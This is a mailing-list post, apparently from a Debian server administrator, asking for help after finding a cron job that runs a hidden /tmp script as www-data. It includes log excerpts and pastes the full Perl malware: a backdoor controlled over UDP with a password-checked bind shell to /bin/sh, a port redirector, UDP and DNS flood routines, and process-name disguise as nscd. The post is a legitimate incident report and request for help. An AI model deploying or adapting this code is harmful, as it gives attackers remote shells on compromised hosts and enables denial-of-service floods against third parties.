Hello,
I logged in to my server today to find that
/usr/sbin/ncsd was running about 50 copies,
since I don't have BIND installed, obviously
something was up...they were also running with
the user www-data...
After a little bit of research I found a new
crontab entryFile: /tmp/crontab.XXXXLYukbF
0 * * * * /tmp/.nscdrecover
this starts at
auth.log.0:Jun 6 17:00:01 debian
PAM_unix[26934]: (cron) session opened for user
www-data by (uid=0)auth.log.0:Jun 6 17:00:02
debianPAM_unix[26934]: (cron) session closed for user
www-dataand runs every hour
and under SYSLOG it starts
syslog.3:Jun 6 16:27:27 debian crontab[26795]:
(www-data) LIST (www-data)syslog.3:Jun 6
16:27:28 debiancrontab[26798]:
(www-data) REPLACE (www-data)syslog.3:Jun 6
16:27:34debian crontab[26804]:
(www-data) LIST (www-data)syslog.3:Jun 6
16:27:34 debiancrontab[26807]:
(www-data) REPLACE (www-data)syslog.3:Jun 6
17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD
(/tmp/.nscdrecover)
so I found /tmp/.ncsdrecover and it looks like
some kind of port scanner/trojan
the contents are pasted below
#!/usr/bin/perl -w
$pass = "J9YcGEyNypkzI";
$str = 'Mess with the best - die like a
rest!'x1337;
use IO::Socket;
use IO::Select;
use POSIX;
sub redir
{
my $port = shift;
my $dest = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
$sa = IO::Socket::INET->new( Proto => "tcp",
Listen => 1, ReuseAddr => 1,
LocalPort =>$port) or exit;
$sin = $sa->accept or exit;
close($sa);
alarm 0;
$sout = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $dest) or exit;$sin->autoflush(1);
$sout->autoflush(1);
$sel = IO::Select->new($sin, $sout);
while(@sock = $sel->can_read(180)) {
foreach $s(@sock) {
$buf = <$s>; exit unless($buf);
print $sout $buf if($s eq $sin);
print $sin $buf if($s eq $sout);
}}}
sub shell
{
my $port = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 1);
accept(X, S);
close(S);
alarm 0;
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}
sub udp
{
my $host = shift;
my $time = shift;
$sock = IO::Socket::INET->new(Proto =>
'udp', PeerAddr => $host,
PeerPort => int(rand 65535))
or exit;
$sock->autoflush(1); $SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
print $sock $str while(1);
}
}
sub ddns
{
my $host = shift;
my $time = shift;
$sock = new IO::Socket::INET->new(Proto
=> 'udp', PeerAddr => $host,
PeerPort => 53) or exit;
$sock->autoflush(1);
$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
while(1) {
my $s = int(rand(89)+10);
my $r1 = int(rand(89)+10);
my $r2 = int(rand(89)+10);
my $r3 = int(rand(89)+10);
my $r4 = int(rand(89)+10);
send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
$SIG{ALRM} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';
$SIG{INT} = 'IGNORE';
$SIG{QUIT} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
open STDIN, "</dev/null";
open STDOUT, ">/dev/null";
open STDERR, ">/dev/null";
POSIX::setsid();
$csock = IO::Socket::INET->new(Proto => 'udp',
LocalPort => 1337, ReuseAddr => 1) or
exit;while($string =<$csock>)
{
chop($string);
my ($pw, $cmd, $arg1, $arg2) = split "
", $string; next unless($cmd);
next unless($arg1);
next unless(crypt($pw, $pass) eq $pass);
if ($cmd eq "ping") {
my $bsock =
IO::Socket::INET->new(Proto =>
'udp', PeerAddr => $arg1,
PeerPort => $arg2,
ReuseAddr => 1) or
next;
print $bsock "pong ".`uname
-mnrs`;
close $bsock;
} elsif ($cmd eq "die") {
exit if(crypt($arg1, $pass) eq $pass);
} elsif ($cmd eq "redir") {
redir($arg1, $arg2) unless(fork);
} elsif ($cmd eq "shell") {
shell($arg1) unless(fork);
} elsif ($cmd eq "udp") {
udp($arg1, $arg2) unless(fork);
} elsif ($cmd eq "ddns") {
ddns($arg1, $arg2) unless(fork);
}
}
A little history is that my server was hacked
with some trojan that was sending out SPAM and I
did a fresh reinstall with debian so I could
have automatic updates and the like. I copied
over a few of the home directorys from the old
site.Then this all started after a user logged
in onFriday June 6th first login at 14:16 ending
14:24the script starts at 14:27
worldspe ftpd26405 pm6-s104.amazon. Fri Jun
6 15:06 - 15:06 (00:00)worldspe ftpd26325
pm6-s104.amazon. Fri Jun
6 14:51 - 14:51 (00:00)worldspe ftpd26315
pm6-s104.amazon. Fri Jun
6 14:49 - 14:49 (00:00)worldspe ftpd26291
pm6-s104.amazon. Fri Jun
6 14:43 - 14:44 (00:00)worldspe ftpd26183
pm6-s104.amazon. Fri Jun
6 14:16 - 14:24 (00:07)
The question is could this of been started via a
php script and if so what should I look for in
order to neutralize it and communicate with this
user ?
I already moved the /tmp file out.
While greping the php files I found nothing that
had /tmp or ncsd listed in it at all. This is
just kind of weird, and I was wondering if
anybody could be of help. Also no other files or
cgi-bin files were uploaded, so it might just be
a coincidence, but my logic points to it being
something that happened via something that was
uploaded.
I just don't know where this came from. I am
running Debian 3.0 woody with all security
update files. I ran rtkitchk and found nothing.
So I'm really perplexed as to what could of got
this script on the server. Any help would be
greatly appreciated as I found nothing about
this script by google.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
